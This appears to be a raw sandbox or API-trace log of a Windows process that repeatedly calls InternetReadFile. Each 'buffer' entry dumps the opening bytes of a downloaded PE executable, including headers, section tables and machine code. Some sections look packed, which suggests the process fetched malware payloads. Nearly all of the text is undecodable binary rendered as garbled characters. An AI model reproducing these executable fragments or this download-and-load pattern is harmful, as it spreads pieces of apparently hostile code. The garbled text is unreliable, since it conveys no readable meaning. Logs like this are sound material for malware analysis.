( ( MZ.*<(! (" PE.*X( X( X X8ˆ(ZX(# ($ o% &o& o' C3Jo' S3>X("  X("   € n~j n(( +X?pÿÿÿ-Þ Þ&Þs&*R ò( *â$%Ð( € K%Ð( €€*BSJB v4.0.30319l<#~¨Ü#Strings„ D#USÈ #GUIDØ ´#BlobW•< ú3' (xÁåÁ¬áÔý[ý<ýÌý˜ý±ýëýÀ¢ž¢ý$Hå-å_³å%åqåå
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¤Ègà V.t €@ À`…àsK€¸   H.text4T V `.rsrc¸€X@@.reloc  ^@BtH(äÐüøàâ’*(*0¸ þ8þ Ed,W8_} ~â{Ä:Êÿÿÿ& 8¿ÿÿÿ( } ~â{×9Ÿÿÿÿ& 8”ÿÿÿ|( *|(+ ~â{¬9eÿÿÿ& 8Zÿÿÿ0{ þ8þ EW+8R( ~â{é:Ïÿÿÿ& 8Äÿÿÿ(o  ~â{›:£ÿÿÿ& 8˜ÿÿÿ*&~þ*~*07( }} }|(+|( *0/( } } | (+| ( *0/( }}|(+|( *.rap( *.r“p( *0§  þ8þ E8 *(  ~â{ï:& 8þ E8o ~â{ß:& 8þ E=88o 8Øÿÿÿs  ~â{¶:½ÿÿÿ& 8²ÿÿÿrap( o ~â{º:& 8þ E5R80r“p( o ~â{Ý9Åÿÿÿ& 8ºÿÿÿo Žio  8ÿÿÿÝ­þÿÿ9[ ~â{Û:& 8þ E+8o! ~â{“:Óÿÿÿ& 8ÈÿÿÿÜ:H 8þ EO)8J8E ~â{ì9Ñÿÿÿ& 8Æÿÿÿo! ~â{Ë:«ÿÿÿ& 8 ÿÿÿÜ& ~â{æ9& 8þ E8s z ~â{™9výÿÿ& 8kýÿÿALۜwcayÚv((P8&~þ*~*2(" o# *0;  þ8þ E,UR8} ~â{å9Êÿÿÿ& 8¿ÿÿÿs# ~â{¾:¤ÿÿÿ& 8™ÿÿÿ*o$ þ$s% (+%(' :8s( z ~â{ò9& 8þ E8ݕÿÿÿ& ~â{Á:& 8þ E8s z ~â{Ë:âþÿÿ& 8×þÿÿ}gä8&~þ*~*0Î  þ8þ E8*Ð%(, (- t%o. ~â{ :& 8þ E8Ý­ÿÿÿ& ~â{å:& 8þ E8s z ~â{¥:Oÿÿÿ& 8Dÿÿÿ&Qw8&~þ*~*() *0§ þ8þ E4 C8~*~9. ~â{´:Âÿÿÿ& 8·ÿÿÿ8Ìÿÿÿ 8¨ÿÿÿr­pÐ (, o/ s0 € ~â{“:vÿÿÿ& 8kÿÿÿ~*€*j(+rçp~o1 t*&~þ*~*0B þ8þ E(bFSѱŸÊ!)PéØŒwN›†ä¦¹r7‚8#8u ~â{ø:eÿÿÿ& 8Zÿÿÿo ~â{•9>ÿÿÿ& 83ÿÿÿ o9j ~â{Ì:ÿÿÿ& 8ÿÿÿ*8øÿÿÿ ~â{”:èþÿÿ& 8Ýþÿÿo 8Êþÿÿ(ìo‘ 8²þÿÿ(âo‘ 8šþÿÿo ~â{í9~þÿÿ& 8sþÿÿ(;o‘ 8[þÿÿ8Rÿÿÿ 8Lþÿÿ(öo‘ þ8,þÿÿ8'ÿÿÿ ~â{¹:þÿÿ& 8 þÿÿ8‹ ~â{¥:óýÿÿ& 8èýÿÿ o:Û ~â{Ä9Äýÿÿ& 8¹ýÿÿ @o:÷þÿÿ 8Ÿýÿÿ8–þÿÿ ~â{»:†ýÿÿ& 8{ýÿÿ8Cþÿÿ 8lýÿÿ o: ~â{š:Hýÿÿ& 8=ýÿÿ(Îo‘ þ8ýÿÿ8þÿÿ ~â{Õ:ýÿÿ& 8ýüÿÿoì*s 8äüÿÿo 8Òüÿÿo ~â{½9¶üÿÿ& 8«üÿÿ o:(þÿÿ ~â{ç:‡üÿÿ& 8|üÿÿ €o9[ 8büÿÿ(Øo‘ ~â{¼:@üÿÿ& 85üÿÿ8;ÿÿÿ ~â{ñ9üÿÿ& 8üÿÿ o9•þÿÿ 8÷ûÿÿo ~â{¤:Ûûÿÿ& 8Ðûÿÿ0· þ8þ E`fF8[~ 8Íÿÿÿ*þ1s7 ~â{Û:¨ÿÿÿ& 8ÿÿÿo9 þ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ѶBS•×,•×,•×,¼/˜×,¼)/×,Ç¢(‡×,Ç¢/ƒ×,Ç¢)Ì×,¤‹Ñ—×,¼(‚×,¼-†×,•×-g×,Y¢%”×,Y¢Ó”×,Y¢.”×,Rich•×,PEL4ƛgà ò·Ÿ@0@€EÈÐààÄEØá8ãâ@8.textêðò `.rdatarHJö@@.dataÜm`,@@À.rsrcàÐl@@.relocÄEàFn@BhÐÉDèYÃÌÌÌÌhpÉDèYÃÌÌÌÌj hÔÏE¹dnFè/h0ÊDèæŒYÃÌÌÌj høÏE¹”tFèÿ.hÊDèÆŒYÃÌÌÌjhÐE¹TuFèß.hðÊD覌YÃÌÌÌj h$ÐE¹´oFè¿.hPËD膌YÃÌÌÌjhHÐE¹LtFèŸ.h°ËDèfŒYÃÌÌÌjh`ÐE¹ŒmFè.hÌDèFŒYÃÌÌÌjh{ÎE¹$uFè_.hpÌDè&ŒYÃÌÌÌjh{ÎE¹„uFè?.hÐÌDèŒYÃÌÌÌjh{ÎE¹ÌoFè.h0ÍDèæ‹YÃÌÌÌjh{ÎE¹mFèÿ-hÍDèÆ‹YÃÌÌÌjh€ÐE¹nFèß-hðÍD見YÃÌÌÌjhŒÐE¹8xFè¿-hPÎD膋YÃÌÌÌjh˜ÐE¹ÜtFèŸ-h°ÎDèf‹YÃÌÌÌjh¤ÐE¹llFè-hÏDèF‹YÃÌÌÌjh°ÐE¹|tFè_-hpÏDè&‹YÃÌÌÌjhÄÐE¹\pFè?-hÐÏDè‹YÃÌÌÌjDhØÐE¹ØwFè-h0ÐDèæŠYÃÌÌÌj\h ÑE¹ToFèÿ,hÐDèÆŠYÃÌÌÌj h€ÑE¹tpFèß,hðÐD覊YÃÌÌÌjhÑE¹ lFè¿,hPÑD膊YÃÌÌÌjh˜ÑE¹„rFèŸ,h°ÑDèfŠYÃÌÌÌj<h´ÑE¹ÜkFè,hÒDèFŠYÃÌÌÌj hôÑE¹ÄkFè_,hpÒDè&ŠYÃÌÌÌj hÒE¹€xFè?,hÐÒDèŠYÃÌÌÌjXhÒE¹LqFè,h0ÓDèæ‰YÃÌÌÌjhtÒE¹°xFèÿ+hÓDèÆ‰YÃÌÌÌjhŒÒE¹DvFèß+hðÓD覉YÃÌÌÌjh˜ÒE¹ÀwFè¿+hPÔD膉YÃÌÌÌjh¤ÒE¹älFèŸ+h°ÔDèf‰YÃÌÌÌjh¬ÒE¹TrFè+hÕDèF‰YÃÌÌÌjh´ÒE¹DsFè_+hpÕDè&‰YÃÌÌÌjh¼ÒE¹ÔsFè?+hÐÕDè‰YÃÌÌÌjhÄÒE¹<lFè+h0ÖDèæˆYÃÌÌÌjhÌÒE¹´uFèÿ*hÖDèÆˆYÃÌÌÌjhÔÒE¹|qFèß*hðÖD覈YÃÌÌÌjhÜÒE¹ürFè¿*hP×D膈YÃÌÌÌjhäÒE¹ rFèŸ*h°×DèfˆYÃÌÌÌjhìÒE¹xwFè*hØDèFˆYÃÌÌÌjhôÒE¹¤sFè_*hpØDè&ˆYÃÌÌÌjhüÒE¹hxFè?*hÐØDèˆYÃÌÌÌjhÓE¹<uFè*h0ÙDèæ‡YÃÌÌÌjh ÓE¹ÌlFèÿ)hÙDèÆ‡YÃÌÌÌjhÓE¹ülFèß)hðÙD覇YÃÌÌÌj h0ÓE¹,mFè¿)hPÚD膇YÃÌÌÌj h@ÓE¹ÄnFèŸ)h°ÚDèf‡YÃÌÌÌjhPÓE¹˜xFè)hÛDèF‡YÃÌÌÌjhXÓE¹øxFè_)hpÛDè&‡YÃÌÌÌjh`ÓE¹ÌuFè?)hÐÛDè‡YÃÌÌÌjhhÓE¹¨wFè)h0ÜDèæ†YÃÌÌÌjhpÓE¹nFèÿ(hÜDèÆ†YÃÌÌÌj h|ÓE¹(yFèß(hðÜD覆YÃÌÌÌj hŒÓE¹\mFè¿(hPÝD膆YÃÌÌÌjhœÓE¹ìpFèŸ(h°ÝDèf†YÃÌÌÌjh¤ÓE¹ìmFè(hÞDèF†YÃÌÌÌjh¬ÓE¹$oFè_(hpÞDè&†YÃÌÌÌjh´ÓE¹dqFè?(hÐÞDè†YÃÌÌÌjh¼ÓE¹loFè(h0ßDèæ…YÃÌÌÌjhÄÓE¹ xFèÿ'hßDèÆ…YÃÌÌÌjhÌÓE¹ uFèß'hðßD覅YÃÌÌÌjhØÓE¹LnFè¿'hPàD膅YÃÌÌÌjhàÓE¹tFèŸ'h°àDèf…YÃÌÌÌj hèÓE¹4tFè'háDèF…YÃÌÌÌjhøÓE¹ÔpFè_'hpáDè&…YÃÌÌÌjhÔE¹„lFè?'hÐáDè…YÃÌÌÌjhÔE¹ÔvFè'h0âDèæ„YÃÌÌÌjhÔE¹vFèÿ&hâDèÆ„YÃÌÌÌjhÔE¹¼pFèß&hðâD覄YÃÌÌÌjh$ÔE¹xFè¿&hPãD膄YÃÌÌÌjh8ÔE¹¤pFèŸ&h°ãDèf„YÃÌÌÌjhLÔE¹wFè&häDèF„YÃÌÌÌjhlÔE¹pFè_&hpäDè&„YÃÌÌÌjh€ÔE¹|nFè?&hÐäDè„YÃÌÌÌjh˜ÔE¹dtFè&h0åDèæƒYÃÌÌÌjh¤ÔE¹ôqFèÿ%håDèÆƒYÃÌÌÌjh¼ÔE¹@yFèß%hðåD覃YÃÌÌÌjhÈÔE¹wFè¿%hPæD膃YÃÌÌÌjhàÔE¹TlFèŸ%h°æDèfƒYÃÌÌÌjhôÔE¹œoFè%hçDèFƒYÃÌÌÌjhüÔE¹”qFè_%hpçDè&ƒYÃÌÌÌjhÕE¹ÜnFè?%hÐçDèƒYÃÌÌÌjh,ÕE¹qFè%h0èDèæ‚YÃÌÌÌjh8ÕE¹œrFèÿ$hèDèÆ‚YÃÌÌÌjhDÕE¹¼vFèß$hðèD覂YÃÌÌÌjhPÕE¹4qFè¿$hPéD膂YÃÌÌÌjhdÕE¹ðwFèŸ$h°éDèf‚YÃÌÌÌjhxÕE¹yFè$hêDèF‚YÃÌÌÌjh€ÕE¹luFè_$hpêDè&‚YÃÌÌÌj@hˆÕE¹üoFè?$hÐêDè‚YÃÌÌÌjhÌÕE¹lrFè$h0ëDèæYÃÌÌÌjLhØÕE¹ÄqFèÿ#hëDèÆYÃÌÌÌj<h(ÖE¹¤mFèß#hðëD要YÃÌÌÌj hhÖE¹ìsFè¿#hPìD膁YÃÌÌÌjhxÖE¹<rFèŸ#h°ìDèfYÃÌÌÌjh„ÖE¹¬qFè#híDèFYÃÌÌÌjhÖE¹tFè_#hpíDè&YÃÌÌÌ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELëÝÉgà Ò®pI@ Iõé@€Wkðø ðð@à.rsrcð@À.idata @À Ð) @àmzhehwmcpð/b@àroelxloa`Ih@à.taggant0pI"l@à
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELëÝÉgà Ò®pI@ Iõé@€Wkðø ðð@à.rsrcð@À.idata @À Ð) @àmzhehwmcpð/b@àroelxloa`Ih@à.taggant0pI"l@à
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $DØþe¹6¹6¹6ҕ7¹6ғ7¹6Ҕ7¹6ґ7¹6¹‘6 ¹6Ҙ7 ¹6Òo6¹6Ғ7¹6Rich¹6PEd†øÄ®ð" |þ‚@ Ðö#`Á <¢´ð¤ÌàÀ šT(‘ .text€{| `.rdataÈ"$€@@.dataÀ¤@À.pdataà¨@@.rsrcÐðή@@.reloc À|@BÌÌÌÌÌÌÌÌE3ÉHBÿAºþÿÿA»W€I;ÂEGËE…ÉxGH…Òt"L+ÒL+ÁIH…ÀtAŠ„Àt ˆHÿÁHƒêuäH…ÒHAÿHEÁH÷ÚEÉA÷ÑAáz€ÆëH…ÒtÆA‹ÁÃÌÌÌÌÌÌÌÌÌÌE3ÉL‹ÒM‹ØH‹ÑA¸W€IBÿH=þÿÿEGÈE…Éx5I‹ÊH‹ÂM…Òt€8t HÿÀHƒéuòH‹ÁH÷ØEÉA÷ÑE#ÈH…ÉtM‹ÂL+ÁëE3ÀE…ÉxXI‹ÊII+Èt.H‹ÁMˆþÿÿI+ÂLÈL+ÚM…ÉtAŠ„ÀtˆIÿÉHÿÂHƒéuåH…ÉHBÿHEÂH÷ÙEÉA÷ÑAáz€ÆA‹ÁÃÌÌÌÌÌÌÌÌÌÌL‰D$L‰L$ SVWHƒì 3ÿHBÿH=þÿÿH‹ñ¹W€Gù…ÿx;HZÿH‹ÎH‹ÓLL$X3ÿHÿ˜„D…ÀxH˜H;Ãwu@ˆ<3ë@ˆ<3¿z€ëH…ÒtÆ‹ÇHƒÄ _^[ÃÌÌÌÌÌÌÌH‰\$H‰l$VWAVHì€H‹ ®H3ÄH‰D$pL‹ñfÇD$l3íH …‹ý‰l$hHÿ€DH‹ØH…À„šHð„H‹ÈHÿ.€DH‹ðH…ÀtmHD$`A‰.H‰D$PDE ‰l$HHL$h‰l$@}‰l$8A¹ ‰l$0²‰l$(‰l$ Hÿñ~D…Àt$H‹T$`M‹Æ3ÉH‹ÆÿµƒH‹L$`Hÿ¡~DH‹ËHÿÊD‹ÇH‹L$pH3Ìè¦qLœ$€I‹[(I‹k0I‹ãA^_^ÃÌÌÌÌÌÌÌÌÌÌH‹ÄH‰XH‰pH‰xL‰p UHh¡HìH‹ö¬H3ÄH‰EG‹-®E3öD‰u?fÇECD‰u'A^;Ã…’HM'è‡þÿÿ…À…hHÿŒ€DH‹ÈLE/SHÿæ}D…À„WH‹M/HE+E3ÉH‰D$ E3À‹ÓHÿ•}D…À…HÿY~Dƒøz…ë‹U+3ÉHÿ€DH‹øH…À„ÎD‹M+HE+H‹M/L‹Ç‹ÓH‰D$ Hÿ9}D…À„•HE7A¹ H‰D$PHM?D‰t$HA¸ D‰t$@ŠÓD‰t$8D‰t$0D‰t$(D‰t$ Hÿ4}D…ÀtLA‹öD97v4»H‹U7‹ÎHÉH‹LÏHÿ}D…Àuó;7rÜë ‰ά‰]'H‹M7Hÿ¼|DH‹ÏHÿÕ}DH‹M/Hÿ}D‹E'ë‹ ‘¬»‹E'…ÀEˉ ~¬H‹MGH3Ìè–oLœ$I‹[I‹sI‹{ M‹s(I‹ã]ÃÌÌÌÌÌÌÌÌÌH‰\$WHì0H‹ôªH3ÄH‰„$ I‹ùI‹ÀH‹Ùêt'ƒúuIÀÃ÷ÿÿIƒøwH‹ÐHÿôDëh3ÀëiHÿ €DH‹ÐH‹Ëèú6H‹ ûÈLD$ A¹ÆD$ ‹×Hÿ¢DLD$ º?H‹ËHÿ±DƒÉÿHÿ’D¸H‹Œ$ H3Ìè nH‹œ$HHÄ0_ÃÌÌÌÌÌÌÌH‰\$H‰l$H‰t$WHƒì H‹H‹òH‹ù3íë@8+tjHÿþH‹ÎèÌfH…Àuè¾H‹ÎH‰è¹fH…ÀuH‹û€?tHÿÇH‹ÎÿžèœfH…ÀtæHcÅHÀ8tÆHÿÀH‹\$0H‹l$8H‹t$@HƒÄ _ÃÌ3ÀëæÌÌÌÌÌÌÌÌH‰\$UVWATAUAVAWH¬$úÿÿHìpH‹^©H3ÄH‰…`L‹ñHEPM‹ÖHMPL+ÐM‹ùE3íM‹àºH‚úþÿH…ÀtAŠ „Àt ˆHÿÁHƒêuáH…ÒHAÿHEÁDˆ(€}P"u H#€HEQë H€HEPHL$0H‰D$0è»þÿÿH‹|$0HƒËÿH‹ðH…ÿtlH‹ÃHÿÀD8,u÷HƒørZŠG±\<:u8Ot8uH:ÁuDHD$@L‹ÇL+ÀHL$@ºH‚úþÿH…ÀtAŠ„Àt ˆHÿÁHƒêuáH…ÒHAÿHEÁDˆ(ëZA¹LY¾HD$@A‹ÑL+ÀHL$@H‚úþÿH…ÀtAŠ„Àt ˆHÿÁHƒêuáH…ÒHAÿL‹ÇA‹ÑHEÁHL$@Dˆ(è¤cº.H‹ÏèWeH…À„H ‰\$(ºH‰L$ D‹ËL‹ÀJ~Hÿ¹yDƒø…ÎHL$@Hÿ¯yDƒøÿ„ŒÁè÷Ѓà„~HÄ~H‰t$0HL$0è]ýÿÿH‹ÈH…Àt"D8)H§~H‹D$0HEÁHL$0H‰D$0è3ýÿÿº¹@Hÿ{DH‹ØH…À„ËH‹t$0H=E¨H‹ÏLL$@HV~D8.HEÎE3ÀHÿ•yDL‹ËAlj(¼Lá}HD$@H‰D$(H ~H )~ÇD$ HÿZyD…Àt5ƒ źD8.I‹ÎHEþL‹Çè›öÿÿLD$@ºH‹Ëè‰öÿÿéMƒ%ÙÄûfD9-åÄu%A¸HT$@HL$@L5¼}HÿEzDëL5·}D8.HD$@H‰D$(L§HEþM‹ÎºH‰|$ H‹Ëè^÷ÿÿéÞE3ÉLD$@º%D‰l$(3ÉÇD$ è¸33À鿺.H‹Ïè@cH…À„šHP}‰\$(H‰T$ D‹ËºL‹ÀJ~Hÿ¢wDƒøukH5ѦH‹ÃHÿÀD8,u÷HL$@HÿÃD8,u÷H<¹@HWHÿ3yDH‹ØH…ÀuE3ɺµE3ÀéNÿÿÿLL$@L‹ÆHWH‹Èè†öÿÿ鿹@‹×HÿêxDH‹ØH…Àt·HL$@HÿwDƒøÿt}¨uyLD$@‹×H…`L+ÀH`H‚þûÿH…ÀtBŠ„Àt ˆHÿÁHƒêuáH…ÒHAÿHEÁDˆ(H…ötmD8.thLÙ{H‹×H`èõÿÿL‹ÆH`H‹×èõÿÿë>H…`L+ðH•`H‡þûÿH…ÀtBŠ2„Àt ˆHÿÂHƒïuáH…ÿHJÿHEÊDˆ)L‹ÃDˆ+H‹ÓH`è›I‰$¸H‹`H3Ìè‡hH‹œ$¸HÄpA_A^A]A\
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELQÿ­à" 0"f; `@ @`…;O`œ€ €:8  H.textø " `.rsrcœ`&@@.reloc €,@B.CSS‚ ‚.@ÀH;HÀ*À0¤(   +>~~Ži~~Ži(~~Ži~~Ži(X 2¾Þ&Þrp(rp((+~~Ži@o ~ ˆ~(*HPb %Ð( €*0å AA? È« Û}Z \4A YÒJ [x,Z §^ vÇào %¦ —s' î<Òb G›ø ŸYÓ' ž³ µªE ƒ²¡ :eN Û %`æ u²T +(ó  æ ò] W÷• ë;Œ ÔY¯] \˾d \Ç¢v û®Q üæ< ]2³ 夭' o½  wà »!j+ x¾! 6í8" ¼ˆ.# Œ&$ Äî% gÓ=& ð;:N' |¦¯K( \›j) pô¹:* _‡áY ·G‡Z+ ¦ƒ,n!j&&)"1  nj[m +'\jn[mn!j0j n[&nj2 nj[&+( \$Z-* - .nj0  Z +Y! 1 ,n j[i/+(-//( ( œ.//]‘œÞ&Þ/X// 2Ïn)j1 &a [&/0+40-/‘X./‘X ]0-0‘2-0-/‘œ-/2œ/X// 2Ã/0138q 9¸é^4 ’§r5 ¸Ù` 6 Ñß'A7 `ˆ%8 ¶Á B9 ‡d°: •Äòx; JXÆk< šÑ|(= eŽps> eTÇA? mô…{@ ¤>A È*r1B ¡³S[C z”>D ‘ÐåGE ¿qw7F N/2'G ¯ŒýH  3pI 3•,L þ&Ú ßIFJ ¦1·iK Åى$L Ÿê·p c´@M üVdN Fÿ—O ù¢. P ÿ¸3RQ ×|¸R ä¾7xS •iY~T õhU ? oV ZÿÚW bH´ZX üèB[Y âª&YZ };7%[ ½9\ o/3] `…]^ š Ch_ ™£eY` FNa ¨¬?b ûÙtmc 5Œ,d[aZLAj`nai4;:Za<n9jam:cj\n/ CDZF+Fj:n[&O4[I=>Z:8nPj1YjKn[&Sj6n/R6Y9^2 Jj?n[mH[S2 cj@nXmZ+.NW[&^jZn[iF9jZnaiDWjGnaiYEnJjYiD1X19jIn2M]X=X&&Hn4j0VnPjamZZnDjXmGL57 UXYL+aCX`7&&3X33 ?ƒýÿÿe8ß/X1]/0-/‘X1]0s ff-0‘o ˜± g øDÿ`h ›$i ÅØj –s,k _ü8l “;”7m †Æln ë"fo N"rVp ­½}q ´(r n©9s nïzYt ¶m^u ˆv - ’zw šÂWUx xhpy Öe z `r÷ { Ö0| L¤D+} kO_~ . \ „iž!€ #Lñn ЯÁ!‚ Ä5Ÿƒ eñ† „ Ø:7(… e#x† ½»8‡ yÖÆHˆ —v\)‰ wÎ&2Š ٝ!‹ „šVŒ ßÃI jÊ@`Ž ;Ìx  ž7U 3gNp‘ ¹« ’ G«ð5“ Þg5q” ‰Qœ• œÿ – ŠÕO—-0-/‘œi”a‡yjnXm{–jon&&ƒjkn2‰j}n[&‚†0 mn~j[i…j{n0 ”ta“+€jnYmˆn“arjnlj[mu~jjn2gazxj’nZihŠj•n/ qjŽnXm’pw6•aw-/f( r9p( o ( o œÞ&Þ-/‘-0‘X1]˜s ™™-˜‘o s eo šsr1ŒX—sZm+ ƒj{nYmoe‘šÞ&Þš™o aÒšsr/ ŒX—+sZmešœeXee?ýÿÿ*(Ýû‡ÄK¡©0+ È( X2ë( ( (! MZ.*<(" (# PE.*X(! X(! X X8ˆ(ZX($ (% o& 'o'   o( C3J o( S3>X(#  X(#   € n~j n() +X?pÿÿÿ-Þ Þ&Þs&*l  ( *â$%Ð( € K%Ð( €€*BSJB v4.0.30319lH#~´#Strings´ D#USø #GUID ¸#BlobW•< ú3( )ÓìÓ³¡óÛ b C Ó Ÿ ¸ ò Ç´¥´&  <zñ9ñ_
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL×Ýc’¿à! &  @ àa0: Ð ˆ* Ð 0 ¨@ <   Ð.text„% & `P`.data|'@ (, @`À.rdatapDp FT @`@.bss(À €`À.edataˆ*Ð ,š @0@.idataÐ Æ @0À.CRT, Ô @0À.tls Ö @0À.rsrc¨0 Ø @0À.reloc<@ >Þ @0B/48€  @@B/19RȐ Ê" @B/31]'`(ì @B/45š-.@B/57\ À B@0B/70#ÐN@B/81
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELó4cà"! 4pÐ Ëý @AH S› Ȑ xF P/  ð#”   ¤ @.text•  `.rdataÄ @@.data<F0  @À.00cfg€  @@.rsrcx  @@.relocð#  $" @B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL¤4cà"! ¶^À¹€ jª @A`ãWä·, ° P/0 ØAS¼øhРì¼ÜäZ.textaµ¶ `.rdata” Ð º@@.dataDàÄ@À.00cfg È@@.tls Ê@À.rsrc° Ì@@.relocØA0 BÖ@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ٓ1Cò_ò_ò_)n°Ÿò_”ŠÌ‹ò_ò^"ò_Ϛ^žò_Ϛ\•ò_Ϛ[Óò_ϚZÑò_Ϛ_œò_Ϛ œò_Ϛ]œò_Richò_PEL‚ê0]à"! (‚`Ù@ ð,à@Ag‚Ïèr ðœèA°¬=`x8¸w@päÀc@.text’&( `.dataH)@,@À.idata¬pD@@.didat4X@À.rsrcð Z@@.reloc¬=°>^@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELÐ4cà"! Ø.`£pl- @Aä&úÞÄ@Px P/`\°ð |Ê\€&@.text‰×Ø `.rdatalïððÜ@@.dataDRà.Ì@À.00cfg@ú@@.rsrcxPü@@.reloc\` @B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELó4cà"! ÌðPÏSg@ADvS—wð°€ÀP/ÀÈ58qà {Œ.text&ËÌ `.rdataÔ«à¬Ð@@.data˜ |@À.00cfg „@@.rsrc€°†@@.relocÈ5À6Š@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $ÀÅäՄ¤Š†„¤Š†„¤Š†08e††¤Š†Ü†¤Š†„¤‹†¬¤Š†Ö̉‡—¤Š†Ö̎‡¤Š†Ö̏‡Ÿ¤Š†Ö̊‡…¤Š†ÖÌu†…¤Š†Ö̈‡…¤Š†Rich„¤Š†PEL|ê0]à"! ސÙð 0Ôm@Aàã ¸ŒúðA  € 8¸ @´.textôÜÞ `.dataôðâ@À.idata„ä@@.rsrcê@@.reloc  î@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $†åÉD„§„§„§Öï£ք§Öï¤҄§Öï¢s„§ñ¢†„§ñ£̈́§ñ¤Ȅ§Öï¦τ§„¦„§ñ®Ƅ§ñ§ħñXħñ¥ħRich„§PEd†Ëgð" Ì8tý €P`P~X¨~Œ ø`ð®0lÀ”p0•8à.textðÊÌ `.rdatan³à´Ð@@.data¬» D„@À.pdatað®`°È@@_RDATAüx@@.rsrcø z@@.relocl0|@BHƒì(A¸ HcH ½è H ܎HƒÄ(éÛé ÌÌÌHƒì(A¸ HÿbH PÄèã H HƒÄ(é«é ÌÌÌHƒì(A¸HóbH @Åè³ H \HƒÄ(é{é ÌÌÌHƒì(A¸ HÏbH ¾èƒ H œHƒÄ(éKé ÌÌÌHƒì(A¸HÇbH €ÃèS H ܏HƒÄ(éé ÌÌÌHƒì(A¸H¯bH P»è# H HƒÄ(éëè ÌÌÌHƒì(E3ÀHâÃH #Äèö H _HƒÄ(é¾è ÌÌÌÌÌÌHƒì(E3ÀH²ÃH “ÄèÆ H ŸHƒÄ(éŽè ÌÌÌÌÌÌHƒì(E3ÀH‚ÃH ýè– H ߐHƒÄ(é^è ÌÌÌÌÌÌHƒì(E3ÀHRÃH ºèf H ‘HƒÄ(é.è ÌÌÌÌÌÌHƒì(A¸HßaH àºè3 H \‘HƒÄ(éûç ÌÌÌHƒì(A¸H¿aH 0Çè H œ‘HƒÄ(éËç ÌÌÌHƒì(A¸HŸaH ÀÂèÓ H ܑHƒÄ(é›ç ÌÌÌHƒì(A¸HaH ¸è£ H ’HƒÄ(ékç ÌÌÌHƒì(A¸$H_aH àºès H \’HƒÄ(é;ç ÌÌÌHƒì(A¸HWaH °ÃèC H œ’HƒÄ(é ç ÌÌÌHƒì(A¸ H?aH €»è H ܒHƒÄ(éÛæ ÌÌÌHƒì(A¸H7aH »èã H “HƒÄ(髿 ÌÌÌHƒì(A¸ H'aH  ¾è³ H \“HƒÄ(é{æ ÌÌÌHƒì(A¸HaH ¾èƒ H œ“HƒÄ(éKæ ÌÌÌHƒì(A¸Hç`H  ½èS H ܓHƒÄ(éæ ÌÌÌHƒì(A¸HÏ`H 0Àè# H ”HƒÄ(éëå ÌÌÌHƒì(A¸ H¯`H Áèó H \”HƒÄ(é»å ÌÌÌHƒì(A¸LH`H лèà H œ”HƒÄ(é‹å ÌÌÌHƒì(A¸H¯`H ·è“ H ܔHƒÄ(é[å ÌÌÌHƒì(A¸dHŸ`H 0Äèc H •HƒÄ(é+å ÌÌÌHƒì(A¸H×`H Áè3 H \•HƒÄ(éûä ÌÌÌHƒì(A¸H¿`H P¾è H œ•HƒÄ(éËä ÌÌÌHƒì(A¸ H¯`H  ¶èÓ H ܕHƒÄ(é›ä ÌÌÌHƒì(A¸ H`H P¿è£ H –HƒÄ(ékä ÌÌÌHƒì(A¸(Ho`H @½ès H \–HƒÄ(é;ä ÌÌÌHƒì(A¸ Ho`H ÁèC H œ–HƒÄ(é ä ÌÌÌHƒì(A¸ HO`H @Äè H ܖHƒÄ(éÛã ÌÌÌHƒì(A¸H/`H °¾èã H —HƒÄ(é«ã ÌÌÌHƒì(A¸H`H `Áè³ H \—HƒÄ(é{ã ÌÌÌHƒì(A¸ Hÿ_H Pºèƒ H œ—HƒÄ(éKã ÌÌÌHƒì(A¸,Hß_H €»èS H ܗHƒÄ(éã ÌÌÌHƒì(A¸Hß_H ºè# H ˜HƒÄ(éëâ ÌÌÌHƒì(A¸ HÏ_H ¿èó H \˜HƒÄ(é»â ÌÌÌHƒì(A¸$H¯_H Àèà H œ˜HƒÄ(é‹â ÌÌÌHƒì(A¸H§_H €»è“ H ܘHƒÄ(é[â ÌÌÌHƒì(A¸H_H 0³èc H ™HƒÄ(é+â ÌÌÌHƒì(A¸Ho_H ¼è3 H \™HƒÄ(éûá ÌÌÌHƒì(A¸HO_H ð·è H œ™HƒÄ(éËá ÌÌÌHƒì(A¸H7_H @½èÓ H ܙHƒÄ(é›á ÌÌÌHƒì(E3ÀH’¼H s¹è¦ H šHƒÄ(éná ÌÌÌÌÌÌHƒì(A¸ Hï^H µès H \šHƒÄ(é;á ÌÌÌHƒì(A¸HÏ^H p¸èC H œšHƒÄ(é á ÌÌÌHƒì(A¸H·^H à³è H ܚHƒÄ(éÛà ÌÌÌHƒì(A¸ H—^H ¿èã H ›HƒÄ(é«à ÌÌÌHƒì(A¸LH[H ¹è³ H \›HƒÄ(é{à ÌÌÌHƒì(A¸H'^H ¹èƒ H œ›HƒÄ(éKà ÌÌÌHƒì(A¸dH[H ºèS 